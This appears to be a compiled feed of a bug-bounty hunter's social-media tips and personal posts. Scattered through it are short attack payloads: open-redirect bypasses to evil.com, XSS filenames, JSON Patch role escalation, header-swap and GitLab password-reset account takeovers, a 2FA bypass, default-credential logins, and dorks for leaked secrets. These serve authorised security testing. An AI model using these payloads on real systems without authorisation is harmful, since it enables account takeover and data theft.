when you are looking for bugs like SSRF & Open Redirect.
and there is a blacklisted character.
try to bypassed using other Unicode characters.
I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82".
poc: redirect_to=////evil%E3%80%82com
#BugBounty
#bugbountytip
always when you found API endpoint like "/api/v4/anything" add "internal" to the route and you will be surprised 😃 for example :
/api/v4/users/<userid> =>> 403
/api/v4/internal/users/<userid> =>> 200
#bugbountytips
#BugBounty
If you find a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
many APIs are vulnerable to "JSON Patch" where you have access to the op, you can add, remove, replace, move, copy
example :
{ "op": "replace", "path": "/role", "value": "admin" },
more info :
#BugBounty
#bugbountytips
I moved From bug bounty to ctf
And I can confirm CTF is the real hacking,
A bug bounty is just an easy game compared to ctf
bug bounty : vulnerability assessment
CTF : real hacking
GET /api/users/1337 => 401
GET /api/users/
x-user-id: 1337
=>> 200 Ok
POST /api/users/<myID>/password-reset
x-user-id: <victimID>
full account takeover :) .
#bugbountytips
Some Devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc .
Dork: site: "$COMPANY"
I already found a lot of leaked critical data
#bugbountytips
People Who Doing Bug Bounty For Red Bull please stop.
You Are Destroying The Field
Don't Do Bug Bounty For Free & Drink & T-shirts ...etc
When Companies Find Stupid Hackers Like You Who Work For Free, Many Other Companies Will Join The Club.
please stop
#BugBounty
I have a friend who joins
#bugbounty
Because of me. He didn't have good internet and no PC. just using his phone.
He found 5 bugs using his phone with the worst internet in the world (Algeria).
I really feel proud of this boy <3 .
Unknown recon Method via
waybackurls $TARGET.app.box.com
or just use google DORK :
site: "$TARGET"
Sometimes the employees upload sensitive files to the public on .
#bugbountytips
#bugbounty
My Goal for the 2023 is to quit bug bounty | cybersecurity and other computer stuff and buy a farm and 10 cows 🐄 and 100 chickens and 1337 sheep .
I'm still looking for the happiness ✍️
I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets!
Very Very useful on Large targets
#BugBounty
#bugbountytips
#infosec
Thousands of US companies have been hacked by Chinese hackers using This RCE.
Microsoft Exchange Server Remote Code Execution CVE-2021-26855 Exploit.
#BugBounty
#RCE
#infosec
Ok, here is another
#bugbountytip
You can find this issue with “login with Google ” too, or any other Idp providers
During the signup process, delete the email value from the scope 💣
I'm curious why
@ECCOUNCIL
offers such expensive certifications when they seem ineffective in cybersecurity. I'm currently taking the CEH course, and the browser-based lab keeps crashing. The PDF is over 2000 pages, with much of the content appearing to be copied from Google
GitLab CE/EE Account Takeover via Password Reset without user interactions CVE-2023-7028
Poc: in the rest password endpoint
user[email][]=valid
@email
.com&user[email][]=attacker
@email
.com
#bugbountytip
How to use FFUF over multiple hosts
$ for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done
#bugbountytips
#BugBounty
#ffuf
I just found Open Redirection on public
#bugbounty
program.
I tried all Open Redirect payload {that I know}, and nothing work, only one payload: redirect_to=//evil.com\
@whiteliste
.com
I hope this will help you :).
#bugbountytip
technique to bypass 2FA I did not saw it In any place.
please tell me If it's public.
steps :
1. enable 2FA In your account
2. login and send the 2FA code to your email & SMS.
3. Wait until the code 2FA expires (it's Depends ..)
4.put any code.
5. b00M!
#bugbountytips
20,000 person follow me , I don't know why there is so many people follow this useless guy.
I don't deserve all these followers at all, but thanks everyone
CVE-2024-27130, an unauthenticated stack overflow bug, which allows remote-code execution on qnap
credit
@watchtowrcyber
Yes Yes it is Friday , the perfect day to drop the 0day
Do not forget to Try login with This Credential In your
#bugbounty
Target :
Email: demo@<company>.com & test<company>.com
Password: demo@<company>.com , 123456789,123456,root, ..other default passwords .
You will log in to The Company as an Admin If you are lucky.
#bugbountytip
someone is fasting and wrote <javascript> instead <script> 😂😂😂😂😂
I spent 20 mint figuring out why my code is not working 😂😂😂😂
#javascript
#RamadanMubarak
Instagram fixed my 2fa bypass and closes my report informative and they said the bug not working! and I still have a video where I recorded the POC .
any suggestions guys?
#BugBounty
if you found apollo-server exposed on /api/graphql , you can manipulate the embedded page via endpoint URL parm , and inject your own host to receive the graphql query (steal users' information ..etc )
#bugbounty
#bugbountytips
FU*K this shit after hours of writing on
@Medium
the post didn't save
now I need to rewrite it again.
I believe Medium is the worst place to share write-ups, is there any alternative?